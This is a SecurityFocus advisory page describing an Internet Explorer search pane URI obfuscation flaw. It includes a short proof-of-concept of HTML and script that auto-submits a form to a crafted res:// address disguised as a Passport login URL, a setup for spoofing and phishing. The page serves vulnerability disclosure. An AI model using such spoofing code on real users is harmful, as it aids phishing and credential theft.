Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Microsoft Internet Explorer Search Pane URI Obfuscation Vulnerability

No exploit is required to leverage this issue. The following script will reproduce this issue:

<form id="foo" action="res://C:\WINDOWS\system32\shdoclc.dll/dnserror.htm#http://login.passport.net/uilogin.srf?id=malware.is.here" method="post"><


<input type="submit" value="default value">
</form>

<a id="fee" href="hotfemail.html" target="_search">test</a>

<script>

var malware = screen.availHeight;
window.moveTo(0, 0);
window.resizeTo(500, malware);
fee.click()
// setTimeout("fee.click();",1);

setTimeout("foo.submit();",1);


</script>







 

Privacy Statement
Copyright 2009, SecurityFocus